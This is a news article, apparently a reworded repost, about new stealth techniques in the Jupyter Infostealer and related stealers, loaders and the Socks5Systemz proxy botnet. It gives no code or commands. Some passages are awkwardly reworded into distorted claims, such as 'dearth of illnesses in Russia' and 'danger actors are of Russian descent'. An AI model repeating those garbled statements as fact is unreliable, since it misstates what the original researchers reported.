top of page

Advanced Stealth Techniques in the New Jupyter Infostealer Version

Updated Jupyter information-stealing virus has reappeared with "simple yet impactful changes" intended to quietly take over infected systems and become persistent.

In a study released with The Hacker News, VMware Carbon Black researchers stated, "The team has discovered new waves of Jupyter Infostealer attacks which leverage PowerShell command modifications and signatures of private keys in attempts to pass off the malware as a legitimately signed file."

Also going by the names Polazert, SolarMarker, and Yellow Cockatoo, Jupyter Infostealer has a history of using malvertising and manipulative search engine optimisation (SEO) techniques as an initial access vector to fool people looking for popular software into downloading it from questionable websites.

In order to exfiltrate data and carry out arbitrary orders, it has the ability to generate encrypted command-and-control (C2) communication and harvest credentials.

In order to give the malware a false sense of validity, the most recent set of artefacts signs it with a variety of certificates; nonetheless, when the virus is launched, the phoney installers initiate the infection chain.

The installers are made to activate a temporary payload that uses PowerShell to establish a remote server connection, decode the stealer malware, and then initiates it.

Online safety

This is a result of the stealer virus that is being sold on the dark web as it keeps developing new strategies and methods that make it easier for less trained players to get started.

Lumma Stealer has also been updated, adding a loader and the capability to create builds at random for enhanced obfuscation.

"This takes the malware from being a stealer type to a more devious malware that can load second-stage attacks on its victims," VMware stated. "The loader provides a way for the threat actor to escalate its attack from data theft to anything up to infecting its victims with ransomware."

Mystic Stealer is another family of stealer malware that has been steadily improving; in addition to its information-stealing capabilities, it has recently incorporated a loader functionality.

Infostealer for Jupyter

"The code continues to evolve and expand the data theft capabilities and the network communication was updated from a custom binary TCP-based protocol to an HTTP-based protocol," Zscaler reported at the end of November.

"The new modifications have led to increased popularity with criminal threat actors leveraging its loader functionality to distribute additional malware families including RedLine, DarkGate, and GCleaner."

The emergence of stealers and remote access trojans like Akira Stealer and Millenium RAT, which are equipped with multiple functionalities to enable data theft, serves as another example of how such malware is always changing.

Online safety

The revelation coincides with reports that malware loaders such as PrivateLoader and Amadey have been seen infecting hundreds of computers with the Socks5Systemz proxy botnet, which has been active since 2016.

Bitsight, a cybersecurity company, disclosed information about the service last week and claimed to have located at least 53 botnet-related servers spread around France, Bulgaria, the Netherlands, and Sweden.

The campaign's ultimate objective is to transform compromised systems into proxies that can route traffic for other actors—legitimate or not—in order to provide an extra degree of anonymity. Given the dearth of illnesses in Russia, it is believed that the danger actors are of Russian descent.

"The proxy service allows clients to choose a subscription ranging from $1 USD to $4,000 USD, payable in full using cryptocurrency," said Bitsight. "Based on network telemetry analysis, it is estimated that this botnet has approximately 10,000 infected systems with victims spread across the globe."

6 views0 comments


bottom of page